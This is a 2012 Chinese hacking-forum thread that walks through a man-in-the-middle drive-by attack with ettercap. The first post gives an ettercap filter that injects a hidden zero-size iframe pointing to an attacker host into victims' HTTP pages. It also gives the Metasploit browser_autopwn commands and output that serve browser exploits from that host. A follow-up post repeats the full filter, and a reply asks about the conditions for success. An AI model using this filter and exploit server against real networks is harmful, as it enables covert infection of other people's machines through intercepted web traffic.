切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
49 : 中间人攻击 ettercap : 挂马[复制链接]
发表于 2012-8-19 00:00:30 | 显示全部楼层 |!read_mode!
首先看这个规则:


  1. if (ip.proto == TCP && tcp.dst == 80) {
  2.    if (search(DATA.data, "Accept-Encoding")) {
  3.       replace("Accept-Encoding", "Accept-Rubbish!");
  4.       # note: replacement string is same length as original string
  5.       msg("zapped Accept-Encoding!\n");
  6.    }
  7. }
  8. if (search(DATA.data, "
复制代码
当有80端口的数据 寻找
</body
,替换成
<iframe src="http://5.5.5.128:8080/" width=0 height=0></iframe></body


很简单,首先来生成网马
  1. msf > use auxiliary/server/browser_autopwn
  2. msf  auxiliary(browser_autopwn) > set URIPATH /
  3. URIPATH => /
  4. msf  auxiliary(browser_autopwn) > set LHOST 5.5.5.128
  5. LHOST => 5.5.5.128
  6. msf  auxiliary(browser_autopwn) > exploit -j
复制代码
等待一段时间
  1. [*] --- Done, found 24 exploit modules

  2. [*] Using URL: http://0.0.0.0:8080/
  3. [*]  Local IP: http://5.5.5.128:8080/
  4. [*] Server started.
复制代码
  1. http://5.5.5.128:8080/就是你的木马地址 替换脚本中的地址,生成的端口别是80端口 为什么你懂的
  2. 编译运行后。。打开百度
复制代码







简单化:
if (tcp.src == 80 && search(DATA.data, "</body")) {
   replace("</body","<iframe src="http://5.5.5.128:8080/" width=0 height=0></iframe></body);
}




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2012-8-19 03:02:30 | 显示全部楼层
上述规则
  1. if (ip.proto == TCP && tcp.dst == 80) {
  2.    if (search(DATA.data, "Accept-Encoding")) {
  3.       replace("Accept-Encoding", "Accept-Rubbish!");
  4.       # note: replacement string is same length as original string
  5.       msg("zapped Accept-Encoding!\n");
  6.    }
  7. }
  8. if (search(DATA.data, "</body")) {
  9.            replace("</body", "<iframe src="http://5.5.5.128:8080/" width=0 height=0></iframe></body");
  10.            msg("Filter Ran.\n");
  11. }
复制代码

操千曲而后晓声,观千剑而后识器。
发表于 2012-8-19 11:54:01 | 显示全部楼层
只有在目标存在相关的浏览器漏洞的时候在能成功?
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-28 07:44

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部